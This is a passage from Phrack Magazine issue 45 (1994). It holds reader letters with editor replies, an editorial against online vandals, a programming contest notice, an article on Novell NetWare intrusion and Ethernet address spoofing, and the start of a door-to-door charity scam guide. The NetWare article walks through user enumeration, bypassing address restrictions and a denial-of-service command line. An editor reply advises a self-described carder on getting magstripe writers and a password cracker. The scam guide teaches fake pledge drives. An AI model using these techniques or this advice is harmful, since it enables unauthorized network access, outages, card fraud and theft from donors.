  1535. car rocks back and forth.  This will fool the panel into thinking
  1536. there's more weight (more cars) sitting on it and it will change the
  1537. light faster.  This also works great with intersections where there
  1538. are two panels--one at the light, and one six or seven car lengths
  1539. back.  Either way, the light is guaranteed to change green quickly!
  1540.  
  1541. [Yes.  Pressure pads are quiet common.  Probably much more so than the
  1542.  light sensors.  Whatever works.]
  1543.  
  1544. ------------------------------------------------------------------------------
  1545.  
  1546.         Hi there !
  1547.  
  1548.         Last week I got in contact with your magazine (#44) and a soft
  1549. called Bluebeep, because I wanted to call BBSs all over the world.
  1550. Reading Phrack, I got more interested is hacking stuff, which I do since
  1551. I first touched a computer when I was 9 (now I'm 20).
  1552.  
  1553.         So, since you offered in the magazine :), I'd like to get some
  1554. info about the subject, specially about free callings. Here is the
  1555. story.
  1556.  
  1557.         Here in Brazil most of the computers have been IBM mainframes
  1558. for a long time, only now changing to UNIX & LANs. Phone lines were a
  1559. shit too, I could say that batter than most since my father works for
  1560. the Brazilian phone co. (Embratel) And that's my point. Brazilian phone
  1561. co. is (still) owned by the federal government. NEC and AT&T are trying
  1562. to end the monopoly. But I think it's much easier to hack it since there
  1563. aren't many hackers here and they don't do a big mess. What should I do
  1564. and have to try this. See, I'm very rookie, so would like some
  1565. guidelines... People here is very afraid to talk about. BTW, could a
  1566. AT&T guy bust me (here, in Rio de Janeiro) for using Bluebeep in the
  1567. 000-8010 ?!?
  1568.  
  1569.         Are there other means of doing free calls ? Embratel has it's
  1570. own Calling Card...
  1571.  
  1572.         Wish I can have your help... I'm a RPG-fanatic and would like to
  1573. connect to Illuminati BBS and others, so I could get more info.
  1574.  
  1575.         Thanx,
  1576.  
  1577.         []s  CAD
  1578.  
  1579. [I wouldn't worry as much about the AT&T guy busting you, as I would
  1580.  the Brazilian Secret Police shooting you for boxing.  I mean, if the
  1581.  government still owns the phone company, they are the ones to watch out for.
  1582.  
  1583.  To contact Steve Jackson Games and the Illuminati BBS, you should think
  1584.  about signing on to io.com.  That is their Internet site.  It's very
  1585.  cool, and has a huge MUD, (if you are into those sort of things.)
  1586.  
  1587.  Good luck in Brazil, and please consider doing a file for our International
  1588.  Scene section on your Country!]
  1589.  
  1590. ------------------------------------------------------------------------------
  1591.  
  1592. - Translation by MIND-NRG (Rome, Italy)
  1593.  
  1594. [All words between [] are additional comments made by the translator]
  1595.  
  1596. Speciale Cyber                                                  September, 1993
  1597. ~~~~~~~~~~~~~~
  1598. by Sergio Stingo (King) [ A good italian magazine ]  (P. 131)
  1599.  
  1600. CyberPunk: everbody is talking about it, but only few people really know what
  1601. it really is. Electronic Books ? A disturbing view of the next future ?
  1602. Electronical conferences ? A new sort of fashion-wears ? The biggest
  1603. democratic revolution of our age ? A silent and creeping revolution ?
  1604. Our Stingo [perhaps a male journalist ?], always curious about everything
  1605. that is <<new>>, is travelling around Italy to investigate about this
  1606. phenomenon.
  1607.  
  1608. It was like taking the lid off a brewing pot. The more He met <<cyber>>
  1609. the more He understood that there was much more to be discovered;
  1610. from the supporter of the <<brain machine>>, who is testing the mysterious
  1611. machine into  discos and  universities, to the first art gallery where
  1612. hackers' work of art are exhibited; from the cyber magazines, as <<Decoder>>,
  1613. to the bands that are discovering a new style of music. Not mentioning sex,
  1614. that, thanks to technology, is trying to increase the range of possible
  1615. sensations. So, the trip beyond the borders of the universe was so rich and
  1616. adventurous, that We have had to divide this articles into two issues.
  1617. In this issue We introduce you to the first one. And, as cybernauts are used
  1618. to say, have a good navigation.
  1619.  
  1620.  
  1621. [ This is the translation for you boys interested into this article. Have a
  1622. good time with it <g>.CyberPunks are unknown in Italy. It's possible to find
  1623. poor articles on them, but no serious issues.]
  1624.  
  1625.                                                       - MIND-NRG -
  1626.  
  1627.  
  1628. [Hey Man!  Thanks for the translation!  I was wondering what that King
  1629.  Magazine article was saying.  Hehe, I ought to get you to translate the
  1630.  whole article!  Haha...Spanish I could do myself, but Italian is a
  1631.  little too different.
  1632.  
  1633.  BTW: We don't have an article on the Italian Hacking scene either.
  1634.  Obviously you guys have developed quite a subculture.  We'd really
  1635.  like to hear more!]
  1636.  
  1637. ------------------------------------------------------------------------------
  1638.  
  1639. This message is in regard to the following article in Phrack #42.
  1640. I was just wondering if there was a way to convert the newer
  1641. sportsters.  My modem does have 4.1 roms, at least that is what
  1642. ati6 displays.  however my modem has problems with the second line
  1643. of command:
  1644.  
  1645.  
  1646.                "Turning your USR Sportster w/ 4.1 roms
  1647.                     into a 16.8K HST Dual Standard"
  1648.  
  1649.                                    by
  1650.  
  1651.                       The Sausage with The Mallet
  1652.  
  1653.  
  1654. If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
  1655. the following commands to it to turn it into an HST 16.8K dual standard.
  1656. In effect, you add HST 16.8K to its V32.bis 14.4k capability.
  1657.  
  1658. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
  1659. atgw03c6,22gw05cd,2f
  1660. ats14=1s24=150s26=1s32=8s34=0x7&w
  1661.  
  1662. I would appreciate it if you could somehow forward the message to
  1663. either the authors.  I realize that this is an old article, but
  1664. I would really appreciate any reply to this question.
  1665.  
  1666.      Sincerely,
  1667.      Sam F.
  1668.  
  1669. [Wow.  I have no idea.  I do know that later versions of the modem
  1670.  took out that, uh, "Feature."  But keep in mind, as modems progress
  1671.  they big feature that everyone wants is flash eprom for the
  1672.  software, so that you can upgrade the modem through software.
  1673.  
  1674.  The future holds a lot of fun for the person who gets his or her hands
  1675.  upon the reprogramming tool and rom images of upgrades for faster
  1676.  modems.]
  1677.  
  1678. ------------------------------------------------------------------------------
  1679.  
  1680. Phrack:
  1681.  
  1682. I would like first to express all my gratitude to you, the Phrack
  1683. editor, and to all of its contributors. You are doing a great job and
  1684. should get credit for it. What really kills me are those wanna-be
  1685. hackers writing you in an often offensive manner, requesting for
  1686. information that no real hacker would expect to see in Phrack. Or
  1687. those sending the /etc/passwd file of their local University and
  1688. thinking they've achieved the hack of the century.
  1689.  
  1690. I've been reading Phrack for quite long time now and was wondering how
  1691. to contribute to it, considering that almost every hackable subject has
  1692. been covered in one of the 44 Phrack issues.
  1693. I saw in issue 42 that you were sort of interested to collect H/P field
  1694. information from countries other than United States. And I thought it
  1695. might be an opportunity for me to send you something that was uncovered
  1696. before. I'm quite sure that you can easily find foreign contributors for
  1697. European countries so I will probably not bother you with H/P-related
  1698. data in France and Sweden (where I used to live). Few months ago, I
  1699. settled in the Asian country you'll identify from my e-mail address and
  1700. have started investigating, in a relaxed mode, hacking and phreaking
  1701. areas. This country is a virgin territory and maybe my researches and
  1702. experiments would provide guidelines for H/P-ers in the same lonely
  1703. situation.
  1704.  
  1705. I was wondering though if you had any kind of recommendations for such
  1706. reports (style, length, depth of details to be given, etc...)
  1707. If anybody in the Far-East area is interested to participate in the
  1708. writing of the report, or just willing to share knowledge with me,
  1709. please feel free to forward my e-mail address to such people.
  1710.  
  1711. Disclaimer:
  1712. Even if I really have the intention to write such a report, no warranty
  1713. should be made upon the delivery time of it. My job is time-consuming
  1714. and leave me very few time for investigations. Apart from that, life in
  1715. this country is also highly entertaining and week-ends are mostly spent
  1716. on parties with nice, nice people.
  1717.  
  1718. ~~ Long live Phrack and its famous skilled contributors. ~~
  1719. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1720.  
  1721.                                              -- Otto Sync --
  1722.  
  1723. [Thanks for the letter of appreciation!  As far as contributions go,
  1724.  we are interested in anything and everything.  For your scene file,
  1725.  just use some of the files on other countries as examples, and I'm sure
  1726.  yours will be fine.
  1727.  
  1728.  Don't worry about getting it to me in any hurry.  Phrack 46 is 3 months
  1729.  away.  :)  ]
  1730.  
  1731. ------------------------------------------------------------------------------
  1732.  
  1733. Hey, guyz!
  1734.  
  1735. What happened to the magazine, I haven't seen any number after 43... In any
  1736. case, send the stuff to me, as soon as possible. Preferably in some kind of
  1737. compressed format.
  1738.  
  1739. I have got here a small question. Firstly, I noticed that a number of
  1740. hackers have E-Mail addresses such as *@phantom.com. Is it possible to get
  1741. one just like this, or you've gotta be some kind of a masquotte?
  1742.  
  1743. I myself am a god-fearing character, not hacking outside my own domain. I
  1744. prefer to produce than to steal. However, I lack chatting and I lack money,
  1745. but I wouldn't steal it. Just to get a different view - for you. Not every
  1746. curious person has to be a criminal.
  1747.  
  1748. Greetings,
  1749.   Verdura (aka Vegetable)
  1750.  
  1751. [Phantom Access is a public access unix that you can get access to just
  1752.  by telnetting to phantom.com and applying as a new user.
  1753.  
  1754.  Yes, indeed, there are a lot of hackers on phantom.com.  In fact, a large
  1755.  number of us ancient LOD types are on there.  More than you would
  1756.  imagine, really.  But it is open to the public, and anyone who cares to
  1757.  pay the usage fees can hang out.
  1758.  
  1759.  As far as back issues, I don't send them out to anyone.  They are available
  1760.  for ftp from ftp.netsys.com in /pub/phrack as .zip files.
  1761.  
  1762.  I do make exceptions for people without ftp access, and will mail
  1763.  (US Mail) disks to whoever sends me postage to:
  1764.  
  1765.  Phrack Magazine
  1766.  603 W. 13th #1A-278
  1767.  Austin, TX 78701  ]
  1768.  
  1769. ------------------------------------------------------------------------------
  1770.  
  1771. Dear phrack type person:
  1772.  
  1773.   I am working on a carding scheme involving stripe-writers.  I have looked
  1774. into getting one but it seems impossible to find someone to sell me one!
  1775. I know publishing information like that is VERY stupid seeing as many
  1776. government officials read phrack without paying for it. And many lamer
  1777. asswipes read it to. That company would stop selling faster than a lamer
  1778. on IRC gets kicked! I need any information on acquiring such a PERFECTLY
  1779. LEGAL device because of the places I tried I could not find one that would
  1780. sell me one!  I also need any tips on magstipe encoding and atm machines
  1781. available. I am adept in the circles of phreekdom and can call Boards if
  1782. need be.  And by the way this board I am mailing from has a dickhead for a
  1783. sysop. I would mail from the public access internet site here, but
  1784. They found my uid shells and kicked me off. They called the cops but being
  1785. the most advanced police force in the nation they haven't a clue how to
  1786. contact me. (the system only asks for you name to get an account) But now
  1787. they require picture ID to get an account. It's a bitch but I have to get
  1788. a fake ID and a fake parent.  I was also attempting to DL cracker jack
  1789. when They kicked me off and I would like to know were I could gopher for it
  1790. or ftp if need be. I lost most internet access except gopher and mail from
  1791. this crap board. ENCRYPT EVERYTHING cause the sysop sux.  I would like to
  1792. subscribe to phrack but this bastard would delete 1 meg of mail quite quickly
  1793. unless it is small, zipped and uuencoded I guess. Well anyway I hope to hear
  1794. from you.
  1795.  
  1796. The government can have my encryption keys when they pry them from my cold
  1797. dead hands.
  1798.  
  1799. -Phiber Phreak
  1800.  
  1801. [It's pretty hard to get such a magstripe writer, but the keyword here is
  1802.  MONEY.  If you have money, they will sell you damn near anything.  You may
  1803.  want to check Bank Technology News (800-835-8403 for subscription) as they
  1804.  have periodic vendor lists.  Additionally you can ask them for a copy of
  1805.  their Card Industry Directory which will have all the info on suppliers that
  1806.  you could ever dream of.  It has a 15 day trial period too, so read it,
  1807.  get what you need and return it (for a full refund).
  1808.  
  1809.  As far as Cracker Jack goes, get on #hack sometime and ask.  I don't have
  1810.  a copy, but i imagine someone online will be able to DCC it to you.]
  1811.  
  1812. ------------------------------------------------------------------------------
  1813.  
  1814.                               ==Phrack Magazine==
  1815.  
  1816.                  Volume Five, Issue Forty-Five, File 3a of 28
  1817.  
  1818. ****************************************************************************
  1819.  
  1820.  
  1821. I try my best to keep Phrack unbiased.  For those of you who know me,
  1822. you know that I am not the most soft-spoken individual in the world, and
  1823. not being able to totally flame everyone and everything puts a great deal
  1824. of stress on me.  This editorial space is my one saving grace.  In this
  1825. I can spew out incredible amounts of crap and everyone should know that
  1826. it is MY OPINION only.
  1827.  
  1828. If anyone else wants to write a "guest" editorial, feel free to email
  1829. it to phrack@well.com.
  1830.  
  1831. ---------------------
  1832.  
  1833. This issue I'm going to rant and rave about assholes on the net.
  1834.  
  1835. You know who you are.
  1836.  
  1837. You break into sites without any purpose, you delete files, you harass
  1838. and annoy, you attempt blackmail, you fake mail, you fake news, you
  1839. sling racial insults and you generally have nothing to offer the
  1840. world.
  1841.  
  1842. You are a disgrace to the hacker community.
  1843.  
  1844. --------------------
  1845.  
  1846. There have always been confrontations online.  It's unavoidable on
  1847. the net, as it is in life, to avoid unpleasantness.  However, on the net
  1848. the behavior is far more pronounced since it effects a much greater
  1849. response from the limited online environments than it would in the real
  1850. world.  People behind such behavior in the real world can be dealt with or
  1851. avoided, but online they cannot.
  1852.  
  1853. In the real world, annoying people don't impersonate you in national
  1854. forums.  In the real world, annoying people don't walk into your room
  1855. and go through your desk and run through the town showing everyone your
  1856. private papers or possessions.  In the real world, people can't readily
  1857. imitate your handwriting or voice and insult your friends and family by
  1858. letter or telephone.  In the real world people don't rob or vandalize
  1859. and leave your fingerprints behind.
  1860.  
  1861. The Internet is not the real world.
  1862.  
  1863. All of the above continually happens on the Internet, and there is
  1864. little anyone can do to stop it.  The perpetrators know full well how
  1865. impervious they are to retribution, since the only people who can put
  1866. their activities to a complete halt are reluctant to open cases against
  1867. computer criminals due to the complex nature of the crimes.
  1868.  
  1869. The Internet still clings to the anarchy of the Arpanet that spawned it,
  1870. and many people would love for the status quo to remain.  However, the
  1871. actions of a few miscreants will force lasting changes on the net as a
  1872. whole.  The wanton destruction of sites, the petty forgeries, the
  1873. needless breakins and the poor blackmail attempts do not go unnoticed
  1874. by the authorities.
  1875.  
  1876. I personally could care less what people do on the net.  I know it is
  1877. fantasyland.  I know it exists only in our minds, and should not
  1878. have any long lasting effect in the real world.  Unfortunately, as the
  1879. net's presence grows larger and larger, and the world begins to accept
  1880. it as an entity in and of itself, it will be harder to convince
  1881. those inexperienced users that the net is not real.
  1882.  
  1883. I have always played by certain rules and they have worked well for me
  1884. in the nearly 15 years I've been online.  These rules can best be
  1885. summed up by the following quote, "We are taught to love all our
  1886. neighbors.  Be courteous.  Be peaceful.  But if someone lays his hands
  1887. on you, send them to the cemetery."
  1888.  
  1889. The moment someone crosses the line, and interferes with my
  1890. well-being in any setting (even one that is arguably unreal such as the
  1891. Internet) I will do whatever necessary to ensure that I can once again
  1892. go about minding my own business unmolested.  I am not alone in this
  1893. feeling.  There are hundreds of net-loving anarchists who don't want the
  1894. extra attention and bad press brought to our little fantasyland by
  1895. people who never learned how to play well as children.  Even these
  1896. diehard anti-authoritatians are finding themselves caught in a serious
  1897. quandary:  do they do nothing and suffer attacks, or do they make the
  1898. phone call to Washington and try to get the situation resolved?
  1899.  
  1900. Many people cannot afford the risk of striking back electronically,
  1901. as some people may suggest.  Other people do not have the skill set needed
  1902. to orchestrate an all out electronic assault against an unknown, even
  1903. if they pay no heed to the legal risk.  Even so, should anyone attempt
  1904. such retribution electronically, the assailant will merely move to a new
  1905. site and begin anew.
  1906.  
  1907. People do not like to deal with police.  No one LOVES to
  1908. call up their local law enforcement office and have a nice chat.
  1909. Almost everyone feels somewhat nervous dealing with these figures
  1910. knowing that they may just as well decide to turn their focus on you
  1911. rather than the people causing problems.  Even if you live your life
  1912. crime-free, there is always that underlying nervousness; even in the
  1913. real world.
  1914.  
  1915. However, begin an assault directed against any individual, and I
  1916. guarantee he or she will overcome such feelings and make the needed
  1917. phone call.  It isn't the "hacking" per se that will cause anyone's
  1918. downfall nor bring about governmental regulation of the net, but the
  1919. unchecked attitudes and gross disregard for human dignity that runs
  1920. rampant online.
  1921.  
  1922. What good can come from any of this?  Surely people will regain the
  1923. freedom to go about their business, but what of the added governmental
  1924. attentions?
  1925.  
  1926. Electronic Anti-Stalking Laws?
  1927. Electronic Trespass?
  1928. Electronic Forgery?
  1929. False Electronic Indentification?
  1930. Electronic Shoplifting?
  1931. Electronic Burglary?
  1932. Electronic Assault?
  1933. Electronic Loitering?
  1934. Illegal Packet Sniffing equated as Illegal Wiretaps?
  1935.  
  1936. The potential for new legislation is immense.  As the networks
  1937. further permeate our real lives, the continual unacceptable behavior
  1938. and following public outcry in that setting will force the ruling
  1939. bodies to draft such laws.  And who will enforce these laws?  And who
  1940. will watch the watchmen?  Oftimes these issues are left to resolve
  1941. themselves after the laws have passed.
  1942.  
  1943. Is this the future we want?  One of increased legislation and
  1944. governmental regulation?  With the development of the supposed
  1945. National Information Super-Highway, the tools will be in place for a new
  1946. body to continually monitor traffic for suspect activity and uphold
  1947. any newly passed legislation.  Do not think that the ruling forces have
  1948. not considered that potential.
  1949.  
  1950. We are all in a serious Catch-22, brought about by a handful of
  1951. sociopaths.  When an unwanted future arises as a direct, or indirect,
  1952. result of their actions, REMEMBER.                         ==Phrack Magazine==
  1953.  
  1954.               Volume Five, Issue Forty-Five, File 4 of 28
  1955.  
  1956.  
  1957.                            //   //  /\   //   ====
  1958.                           //   //  //\\ //   ====
  1959.                          ==== //  //  \\/   ====
  1960.  
  1961.                      /\   //  // \\    //  /===   ====
  1962.                     //\\ //  //   //  //   \=\   ====
  1963.                    //  \\/    \\ //  //   ===/  ====
  1964.  
  1965.                                  PART I
  1966.  
  1967. ------------------------------------------------------------------------------
  1968.  
  1969.                         !! NEW PHRACK CONTEST !!
  1970.  
  1971. Phrack Magazine is sponsoring a programming contest open to anyone
  1972. who wishes to enter.
  1973.  
  1974. Write the Next Internet Worm!  Write the world's best X Windows wardialer!
  1975. Code something that makes COPS & SATAN look like high school Introduction
  1976. to Computing assignments.  Make the OKI 1150 a scanning, tracking, vampire-
  1977. phone.  Write an NLM!  Write a TSR!  Write a stupid game!  It doesn't
  1978. matter what you write, or what computer it's for!  It only matters that you
  1979. enter!
  1980.  
  1981. Win from the following prizes:
  1982.  
  1983.      Computer Hardware & Peripherals
  1984.      System Software
  1985.      Complete Compiler packages
  1986.      CD-ROMS
  1987.      T-Shirts
  1988.      Magazine Subscriptions
  1989.      and MANY MORE!
  1990.  
  1991. STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
  1992.  
  1993. Enter the PHRACK PROGRAMMING CONTEST!
  1994.  
  1995. The rules are very simple:
  1996.  
  1997. 1)  All programs must be original works.  No submissions of
  1998.     previously copyrighted materials or works prepared by
  1999.     third parties will be judged.
  2000.  
  2001. 2)  All entries must be sent in as source code only.  Any programming
  2002.     language is acceptable.  Programs must compile and run without
  2003.     any modifications needed by the judges.  If programs are specific
  2004.     to certain platforms, please designate that platform.  If special
  2005.     hardware is needed, please specify what hardware is required.
  2006.     If include libraries are needed, they should be submitted in addition
  2007.     to the main program.
  2008.  
  2009. 3)  No virii accepted.  An exception may be made for such programs that
  2010.     are developed for operating systems other than AMIGA/Dos, System 7,
  2011.     MS-DOS (or variants), or OS/2.  Suitable exceptions could be, but are not
  2012.     limited to, UNIX (any variant), VMS or MVS.
  2013.  
  2014. 4)  Entries may be submitted via email or magnetic media.  Email should be
  2015.     directed to phrack@well.com.  Tapes, Diskettes or other storage
  2016.     media should be sent to
  2017.  
  2018.          Phrack Magazine
  2019.          603 W. 13th #1A-278
  2020.          Austin, TX 78701
  2021.  
  2022. 5)  Programs will be judged by a panel of judges based on programming skill
  2023.     displayed, originality, usability, user interface, documentation,
  2024.     and creativity.
  2025.  
  2026. 6)  Phrack Magazine will make no claims to the works submitted, and the
  2027.     rights to the software are understood to be retained by the program
  2028.     author.   However, by entering, the Author thereby grants Phrack Magazine
  2029.     permission to reprint the program source code in future issues.
  2030.  
  2031. 7)  All Entries must be received by 12-31-94.  Prizes to be awarded by 3-1-95.
  2032.  
  2033. -------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
  2034.  
  2035. Author:
  2036.  
  2037. Email Address:
  2038.  
  2039. Mailing Address:
  2040.  
  2041.  
  2042.  
  2043. Program Name:
  2044.  
  2045.  
  2046. Description:
  2047.  
  2048.  
  2049.  
  2050.  
  2051. Hardware & Software Platform(s) Developed For:
  2052.  
  2053.  
  2054.  
  2055. Special Equipment Needed (modem, ethernet cards, sound cards, etc):
  2056.  
  2057.  
  2058.  
  2059. Other Comments:
  2060.  
  2061.  
  2062.  
  2063.  
  2064. ------------------------------------------------------------------------------
  2065.  
  2066. Novell NetWare & Ethernet address spoofing with ODI
  2067. ---------------------------------------------------
  2068.  
  2069. Just to save you from the boredom of Yet Another UNIX  Security Weakness, here
  2070. are some things to consider about Novell NetWare for your next Security Audit
  2071. or Hacking session (depending on which side you are on).
  2072.  
  2073. Novell claim to have  over 20 million PCs using their network operating system,
  2074. substantially more than the estimated 4 million TCP/IP systems worldwide.
  2075. There are many reasons for its popularity and its 60 to 80% market share, one
  2076. of which has been its relatively good security.
  2077.  
  2078. NetWare has been one of the few widely available systems which offer some form
  2079. of login encryption of accounts and passwords over the wire, as standard,
  2080. unlike most of its rivals which send them out as plaintext, even if they are
  2081. stored in an encrypted form eventually. Novell now offer RSA based public key
  2082. encryption of the data as well.
  2083.  
  2084. However, since it is so popular, there are likely to be plenty of systems out
  2085. there which have not been upgraded to the latest versions and patch releases
  2086. and which may be still be vulnerable to programs like KNOCK , the patched
  2087. ATTACH command (published in HackTic 16/17 1992), or the University of Leiden's
  2088. HACK (which has been published in issue 43 of PHRACK)
  2089.  
  2090. Since the latest security features are implemented as NetWare Loadable Modules
  2091. for NetWare 3x and 4x, but as Value Added Processes for NetWare 2x,  which
  2092. require the server to be brought down to install them, it is likely that there
  2093. are many NetWare 2x systems which are still vulnerable
  2094.  
  2095. I shall also assume that you are not on one of those wide open "box shift"
  2096. installations where none of the  security features have been switched on (try
  2097. logging in as SUPERVISOR or GUEST  without a password), all the programs and
  2098. data are in a single SYS: volume and the Network Address of the cable is the
  2099. default 00000001.
  2100.  
  2101. Like any project, the more you know about your particular Novell LAN, the
  2102. easier it gets to "explore". Login as GUEST or a normal account.
  2103.  
  2104. Try to see who else is on the system e.g.
  2105.  
  2106. USERLIST /A >c:\ulist.txt
  2107.  
  2108. will give you a list of users currently logged in, with their Ethernet card
  2109. addresses saved to a text file . Your current connection will be marked with
  2110. an asterisk. If your system has 100 or more users, then any sane Supervisor
  2111. will have used some form of logic when allocating the user's login accounts,
  2112. probably based on personnel or id number, often including their initials.
  2113.  
  2114. SYSCON with privilege is what you are aiming to be able to use, but even
  2115. without any privileges, you can still use it to look at your own account,
  2116. change your password etc. You can also see a list of all the other registered
  2117. users.
  2118.  
  2119. This should help you sort the accounts into normal and privileged accounts
  2120. (obviously SUPERVISOR, but often there are SUPERVISOR equivalent accounts, or
  2121. Work Group Manager accounts which stand out from the list). You are quite
  2122. likely to see an account called something like TAPE_BACKUP  or DATA_LOGGER,
  2123. TRAINER, STUDENT1, STUDENT2  i.e. accounts which do not belong to individual
  2124. humans. These often require abnormal security privileges e.g. normal users may
  2125. have their connections broken by the WATCHDOG at say midnight, to ensure that
  2126. they are not modifying files during the nightly tape backup. At an academic or
  2127. industrial site, you are likely to find data logging PCs connected to
  2128. instrumentation or machinery which needs to be monitored or controlled 24
  2129. hours a day. These PCs are likely to have 24 hour accounts which are not time
  2130. restricted at weekends, for example.
  2131.  
  2132. Since it is usually more practical to do tape backups (DAT or helical scan)
  2133. from a separate, dedicated PC rather than from the fileserver itself (one tape
  2134. unit might also back up several fileservers), these PCs are likely to use an
  2135. account e.g. TAPE_BACKUP which is a SUPERVISOR equivalent. If you can get
  2136. physical access to this sort of PC, either datalogger, or tape backup unit,
  2137. you  have a good chance of finding the password on the local drive C:,
  2138. possibly in a file with Hidden and/or System attributes (have a look at the
  2139. AUTOEXEC.BAT and see what it calls)
  2140.  
  2141. The security aware Novell supervisors, will have set up any such accounts with
  2142. an extra level of security which restricts logins to only those Ethernet
  2143. addresses which have been specified. The really sensible ones will have made
  2144. sure that any such machines are sited in physically secure areas, as well.
  2145.  
  2146. Although this is a very good idea, from the security point of view, Novell
  2147. have now provided a mechanism which allows you to get around this:
  2148. the replacement for monolithic IPX/NETX called Open Datalink Interface (ODI)
  2149.  
  2150. Novell's ODI, and its slower Microsoft equivalent Network Driver Interface
  2151. Specification (NDIS), both work by putting a common layer of software between
  2152. the hardware of the Network Interface Card and the rest of the MSDOS
  2153. Redirector. This allows multiple protocol stacks and frame types to be bound
  2154. to the same physical card e.g.
  2155.  
  2156. IPX    TCP/IP    NETBeui   DECnet   Appletalk
  2157. ----------------------------------------------
  2158. Link Support Layer
  2159. ----------------------------------------------
  2160. Hardware Specific device driver e.g. NE2000
  2161.  
  2162. Thus, to start up NetWare on older systems, you had to generate a hardware
  2163. specific version of IPX.EXE for your Ethernet card,
  2164.  
  2165. IPX
  2166. NETX
  2167.  
  2168. Extra parameters were set in SHELL.CFG, now under ODI, things are a little
  2169. bit more complex:
  2170.  
  2171. LSL
  2172. NE2000
  2173. IPXODI
  2174. NETX
  2175.  
  2176. The same parameters as in SHELL.CFG such as preferred server or machine type
  2177. (if you have different versions of MSDOS for different types of PC) can be
  2178. specified in NET.CFG. With ODI, there are more parameters for NET.CFG but the
  2179. worrying/interesting one is the ability to specify a different MAC level
  2180. address to that of your actual Ethernet card. It needs this ability
  2181. to cope with  TCP/IP or DECnet coexistence e.g.
  2182.  
  2183. BUFFERS 100
  2184. MACHINE TYPE COMPAQ
  2185. PREFERRED SERVER FINANCE
  2186. NODE ADDRESS AA-00-04-00-12-34
  2187.  
  2188. Since this DECnet address does not depend on the "real" unique Ethernet
  2189. address which has been burnt into the PROM on the card and is centrally
  2190. registered (originally by Xerox, but now by the IEEE), this mechanism allows
  2191. you to put a different Ethernet card address into NET.CFG, thereby fooling the
  2192. Address Restriction security.
  2193.  
  2194. e.g. NODE ADDRESS 02-60-80-12-34-56
  2195.  
  2196. This is where the data you gathered earlier with USERLIST and SYSCON becomes
  2197. threatening/useful.
  2198.  
  2199. Of course, if your target PC is on a different LAN segment, there may be Routers
  2200. or intelligent hubs which restrict your ability to do this, or at least record
  2201. attempts in a log files which can trace your activity, provided that suspicions
  2202. are aroused before they are periodically wiped out.
  2203.  
  2204. How much of  a security threat this little work around constitutes depends on
  2205. your specific site, but there is another danger/opportunity, namely that of a
  2206. denial of service or nuisance attack on the LAN.
  2207.  
  2208. If you set this connection parameter to be the same as that of another PC, the
  2209. fileserver (Novell, DEC or UNIX)  and the Ethernet has no way of preventing
  2210. some packets intended for just one unique address going to the other, if they
  2211. are both online at the same time. This usually results in PC hangs, incomplete
  2212. closure of files, File Allocation Table problems (usually curable by running
  2213. CHKDSK C: /F, but not within Windows or you will make things worse).
  2214.  
  2215. If by accident or design, you set your PC to have the same address as the
  2216. fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the
  2217. whole network segment (even before you have started to play your multiplayer
  2218. DOOM Deathmatch !).
  2219.  
  2220. This could be achieved with a simple  command in the AUTOEXEC.BAT  e.g.
  2221.  
  2222. echo NODE ADDRESS fileserver Ethernet address >>C:\ODI\NET.CFG
  2223.  
  2224. which  will only take effect the next time the PC is re-booted (allowing a good
  2225. headstart for the perpetrator)
  2226.  
  2227. This could  also be the payload of a virus, which would cause more havoc than
  2228. simply trashing the hard disk of a single PC.
  2229.  
  2230. This problem is due to the inherent design weaknesses of TCP/IP and DECnet,
  2231. which were developed at a time when the number of mini-computers that they
  2232. connected could be counted on your fingers,. DEC or Xerox or Prime etc
  2233. sales teams  could only have dreamed of selling thousands of mini computers to a
  2234. single customer. Nowadays, thousands of PCs connected to central servers are
  2235. quite common, and the problems of duplicate addresses is significant.
  2236.  
  2237. These same features are what make Ethernet Packet Sniffing possible, which
  2238. is what was behind the recent CERT warning and media hype about Internet
  2239. password security, but that is a topic for another article.
  2240.  
  2241. Otaku
  2242.  
  2243. ------------------------------------------------------------------------------
  2244.  
  2245. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  2246.  
  2247. SCAMMING
  2248. DIFFERENT TECHNIQUES AND
  2249. PROCEDURES
  2250.  
  2251.    BY: MARZ
  2252.  
  2253. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  2254.  
  2255. Table of Contents:
  2256. 1.0 Intro
  2257. 1.1 Different types of scams
  2258. 1.2 The right one for you
  2259.  
  2260. 2.0 The Pledge scam
  2261. 2.1 The Donation scam
  2262. 2.2 The Selling scam
  2263.  
  2264. 3.0 What to wear
  2265. 3.1 Where to go
  2266.  
  2267. 4.0 Thanks
  2268.  
  2269. 1.0 The Intro
  2270.  
  2271. First off I would like to say that this file is for entertainment only
  2272. and that you really shouldn't do the stuff mentioned, and the writer doesn't
  2273. take any responsibility for any of the crap people do.
  2274.  
  2275. 1.1 Different types of scams
  2276.  
  2277. Ok in this file I will tell you about 3 types of scams the Pledge scam,
  2278. The Donation scam, and the Selling scam. There are many other scams out there
  2279. which I will cover in future files for instance credit card scams although
  2280. companies are trying harder and harder to prevent this it is still happening.
  2281.  
  2282. 1.2 The right one for you
  2283.  
  2284. Al right now every person is different so in turn so are scams and some
  2285. people and scams don't mix to well for instance if you way 300 Pounds you cant
  2286. really say you are the start cross country runner. So if you are 300 pounds say
  2287. you are the start wrestler/football player. Also age plays a BIG factor if
  2288. you are  30 years old you aren't going to pass to well for a high school
  2289. football player (you always could say you flunked) and if you are 10 years old
  2290. people aren't going to be to anxious to give you donations to save the Rain
  2291. Forests.  Al right I am going to start going into more detail about the right
  2292. scam for you.
  2293.  
  2294. Look at my little chart below:
  2295.  
  2296. Age            good scam
  2297. -----        -----------
  2298.   -10        | selling or pledge
  2299. 11-17        | selling, pledge , or maybe even donations (if old looking)
  2300.    18+       | selling and donations
  2301.  
  2302. 2.0 The Pledge scam
  2303.  
  2304. Al right this scam works great for kids still in school go around asking
  2305. people (that don't live around you) to pledge money for you so your team can
  2306. afford to go to the state meet or what ever. For example one I use is I go to
  2307. peoples houses asking for donations in my Track teams Lap-athon saying that we
  2308. will be running laps for 3 hours to raise money so we can go and compete in the
  2309. state meet. I will ask people if they want to pledge a certain flat amount or
